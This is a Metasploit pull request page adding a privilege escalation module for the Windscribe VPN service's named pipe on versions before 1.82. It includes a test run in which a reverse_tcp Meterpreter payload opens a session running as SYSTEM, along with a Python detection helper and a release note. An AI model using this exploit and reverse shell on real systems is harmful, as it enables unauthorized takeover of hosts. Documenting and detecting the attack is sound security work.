Add Windscribe WindscribeService Named Pipe Privilege Escalation #12894

Merged

Conversation

bcoles

@bcoles bcoles commented Feb 1, 2020

Add Windscribe WindscribeService Named Pipe Privilege Escalation

The Windscribe VPN client application for Windows makes use of a
Windows service WindscribeService.exe which exposes a named pipe
\\.\pipe\WindscribeService allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.

@bwatters-r7 bwatters-r7 self-assigned this Feb 5, 2020

bwatters-r7 commented Feb 5, 2020

msf5 exploit(multi/handler) > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > show options

Module options (exploit/windows/local/windscribe_windscribeservice_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
session => 1
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
verbose => true
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Writing payload (283 bytes) to C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe ...
[*] Sending C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe to \\.\pipe\WindscribeService ...
[+] Opended \\.\pipe\WindscribeService! Proceeding ...
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49682) at 2020-02-05 12:30:36 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
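The test run above shows the pattern a defender can look for: a dropped executable under the user's %TEMP% handed to \\.\pipe\WindscribeService and then executed as SYSTEM. The following detection helper is an added example, not code from this PR or the Metasploit module; it assumes Sysmon Event ID 1 field names, an install path under Program Files for WindscribeService.exe, and constructed sample records.

```python
"""Added example (not part of the PR or the Metasploit module).

Flags Sysmon-style process-creation records in which WindscribeService.exe,
the service behind \\.\pipe\WindscribeService, launches an executable from a
user-writable location: the pattern the exploit run produces.
Field names follow Sysmon Event ID 1; all records below are constructed.
"""
import re

# Locations a standard user can write to. Assumption: a legitimate child of
# WindscribeService.exe would live under Program Files, never in these paths.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\appdata\\local\\temp|windows\\temp|programdata)\\",
    re.IGNORECASE,
)


def is_suspicious_child(record):
    """True if WindscribeService.exe spawned a binary from a user-writable path."""
    parent = record.get("ParentImage", "")
    image = record.get("Image", "")
    if not parent.lower().endswith("\\windscribeservice.exe"):
        return False
    return bool(USER_WRITABLE.match(image))


def find_suspicious(records):
    """Return (ProcessId, Image) pairs that warrant triage."""
    return [(r["ProcessId"], r["Image"]) for r in records if is_suspicious_child(r)]


# Constructed sample records; the Temp path and host name mirror the PR output,
# the Windscribe install directory is an assumption.
SAMPLE_RECORDS = [
    {"ProcessId": 4120, "Image": r"C:\Program Files (x86)\Windscribe\Windscribe.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"DESKTOP-D1E425Q\msfuser"},
    {"ProcessId": 5236, "Image": r"C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe",
     "ParentImage": r"C:\Program Files (x86)\Windscribe\WindscribeService.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 5300, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Windscribe\WindscribeService.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for pid, image in find_suspicious(SAMPLE_RECORDS):
        print(f"[!] pid {pid}: WindscribeService.exe launched {image}")
```

The third record (cmd.exe spawned by the service) is deliberately not flagged here to keep the rule narrow; on a host where the service is not expected to spawn shells at all, widening the parent check is a reasonable tuning step.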

bwatters-r7 added a commit that referenced this pull request Feb 5, 2020
…calation

Merge branch 'land-12894' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 34621c0 into rapid7:master Feb 5, 2020
3 checks passed
@bcoles bcoles deleted the windscribe_windscribeservice_priv_esc branch Feb 5, 2020

bwatters-r7 commented Feb 5, 2020

Release Notes

This PR adds a local privilege escalation module for exploiting a vulnerability in the Windscribe service installed by Windscribe VPN versions < 1.82 that allows a user to run an arbitrary executable as SYSTEM.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 20, 2020